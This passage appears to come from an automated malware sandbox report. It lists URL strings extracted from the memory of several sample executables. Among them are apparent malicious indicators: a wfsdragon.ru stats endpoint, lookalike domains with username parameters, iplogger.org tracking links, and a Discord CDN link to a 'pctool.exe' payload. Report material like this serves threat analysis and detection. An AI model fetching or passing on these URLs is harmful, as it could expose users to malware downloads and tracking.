                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironmentResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/SetEnvironmentResponseH9
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006F4F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000071D7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000723A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003895000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007016000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003B01000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003C8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdate
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003EBF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000418B000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003DD0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003CDE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000409C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E6F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F5E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000072C1000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4159798486.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateLR
                  Source: Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.00000000070DD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.00000000040EC000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007048000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FB2000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.0000000003A85000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007208000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FFD000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000007173000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.0000000006FE4000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000726E000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000413C000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4163393063.00000000039BF000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4172943915.000000000710F000.00000004.00000800.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.3998929703.000000000404D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateResponse
                  Source: Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005960000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.000000000590E000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4175194022.00000000059B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/IContract/VerifyUpdateResponseH9
                  Source: Amcache.hve.30.drString found in binary or memory: http://upx.sf.net
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/api/setStats.php
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru/api/setStats.php2
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfsdragon.ru:80/api/setStats.php
                  Source: explorer.exe, 0000002F.00000000.1918788309.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4182753346.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                  Source: explorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                  Source: explorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_1
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_2
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_3
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_4
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_5
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_6
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://all-mobile-pa1ments.com.mx/?username=p11_7
                  Source: explorer.exe, 0000002F.00000002.4182753346.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                  Source: explorer.exe, 0000002F.00000002.4175875048.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                  Source: explorer.exe, 0000002F.00000002.4175875048.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                  Source: explorer.exe, 0000002F.00000000.1859126284.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1849323092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4147635589.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4157518851.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: explorer.exe, 0000002F.00000002.4175875048.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4175875048.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                  Source: explorer.exe, 0000002F.00000002.4175875048.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                  Source: explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                  Source: explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                  Source: explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buy-fantasy-football.com.sg
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buy-fantasy-football.com.sg/
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buy-fantasy-football.com.sg/?username=p11_1
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buy-fantasy-football.com.sg/?username=p11_2
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buy-fantasy-football.com.sg/?username=p11_3
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buy-fantasy-football.com.sg/?username=p11_4
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buy-fantasy-football.com.sg/?username=p11_5
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buy-fantasy-football.com.sg/?username=p11_6
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://buy-fantasy-football.com.sg/?username=p11_7
                  Source: Mon178817e243.exe, 00000016.00000002.4158008324.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discorP
                  Source: Mon178817e243.exe, 00000016.00000002.4158008324.00000000033F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discorPjY
                  Source: Mon178817e243.exe, 00000016.00000002.4158008324.000000000335D000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.0000000003276000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.000000000328F000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.00000000033F6000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.0000000003394000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.0000000003293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000030BF000.00000004.00001000.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000000.1712015899.0000000000E62000.00000002.00000001.01000000.0000000F.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe.1.drString found in binary or memory: https://cdn.discordapp.com/attachments/873244194234318850/897174379568451604/pctool.exe
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                  Source: explorer.exe, 0000002F.00000002.4164547878.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
                  Source: explorer.exe, 0000002F.00000002.4164547878.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
                  Source: setup_install.exeString found in binary or memory: https://curl.se/
                  Source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1971194426.000000006B4CC000.00000040.00000001.01000000.00000009.sdmp, libcurl.dll.1.drString found in binary or memory: https://curl.se/V
                  Source: setup_install.exe, 00000002.00000002.1971008686.000000006B49E000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                  Source: setup_install.exeString found in binary or memory: https://curl.se/docs/copyright.html
                  Source: setup_installer.exe, 00000001.00000003.1691383572.0000000002F30000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1971194426.000000006B4CC000.00000040.00000001.01000000.00000009.sdmp, libcurl.dll.1.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
                  Source: setup_install.exe, setup_install.exe, 00000002.00000003.1704386977.0000000000770000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1971008686.000000006B49E000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                  Source: explorer.exe, 0000002F.00000002.4182753346.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: svchost.exe, 0000002B.00000003.1818483646.000002804DAE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.43.dr, qmgr.db.43.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                  Source: edb.log.43.dr, qmgr.db.43.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                  Source: edb.log.43.dr, qmgr.db.43.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                  Source: edb.log.43.dr, qmgr.db.43.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: svchost.exe, 0000002B.00000003.1818483646.000002804DAE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.43.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                  Source: setup_install.exe.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: Mon17b5f403be4d8d6b.exe.1.drString found in binary or memory: https://github.com/ControlzEx/ControlzEx
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                  Source: explorer.exe, 0000002F.00000002.4164547878.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1a2jd7
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000255E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/1a3jd7
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002498000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niemannbest.me
